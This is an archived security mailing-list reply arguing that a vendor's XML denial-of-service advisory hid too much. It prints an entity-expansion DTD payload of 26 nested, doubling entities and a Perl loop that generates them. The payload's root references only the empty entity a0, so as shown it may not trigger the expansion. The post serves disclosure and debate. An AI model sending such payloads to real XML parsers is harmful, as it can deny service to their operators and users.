lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: greg-fulldisclosure at nest.cx (Gregory Steuck)
Subject: Re: Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD

>>>>> "Amit" == Amit Klein <Amit.Klein@...ctumInc.com> writes:

    Amit> Multiple vendors XML parser (and SOAP/WebServices server)
    Amit> Denial of Service attack using DTD

Nice work SanctumInc! Great piece of non-disclosure! It's posts like
this one that make Bugtraq a cheap brand name peddling place.

    Amit>  - Other products from other vendors are known to be
    Amit> vulnerable too

Perfect, and since we are not told what the vulnerability is, we are
left vulnerable without any way to find out where the problem lies.

Fortunately, it doesn't take a rocket scientist to devise a DTD that
takes exponential time to process without consuming a lot of memory.
Did you have this one in mind?

<?xml version="1.0"?>

<!-- 
for ($i=1; $i < $ARGV[0]; $i++) {
 $j = $i - 1;
 print <<EOF;
<!ENTITY a$i "&a$j;&a$j;">
EOF
}
-->

<!DOCTYPE a [
<!ENTITY a0 "">
<!ENTITY a1 "&a0;&a0;">
<!ENTITY a2 "&a1;&a1;">
<!ENTITY a3 "&a2;&a2;">
<!ENTITY a4 "&a3;&a3;">
<!ENTITY a5 "&a4;&a4;">
<!ENTITY a6 "&a5;&a5;">
<!ENTITY a7 "&a6;&a6;">
<!ENTITY a8 "&a7;&a7;">
<!ENTITY a9 "&a8;&a8;">
<!ENTITY a10 "&a9;&a9;">
<!ENTITY a11 "&a10;&a10;">
<!ENTITY a12 "&a11;&a11;">
<!ENTITY a13 "&a12;&a12;">
<!ENTITY a14 "&a13;&a13;">
<!ENTITY a15 "&a14;&a14;">
<!ENTITY a16 "&a15;&a15;">
<!ENTITY a17 "&a16;&a16;">
<!ENTITY a18 "&a17;&a17;">
<!ENTITY a19 "&a18;&a18;">
<!ENTITY a20 "&a19;&a19;">
<!ENTITY a21 "&a20;&a20;">
<!ENTITY a22 "&a21;&a21;">
<!ENTITY a23 "&a22;&a22;">
<!ENTITY a24 "&a23;&a23;">
<!ENTITY a25 "&a24;&a24;">
]>

<a>&a0;</a>

Uh-oh, turns out it's the way DTD is supposed to work, not an
implementation defect.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ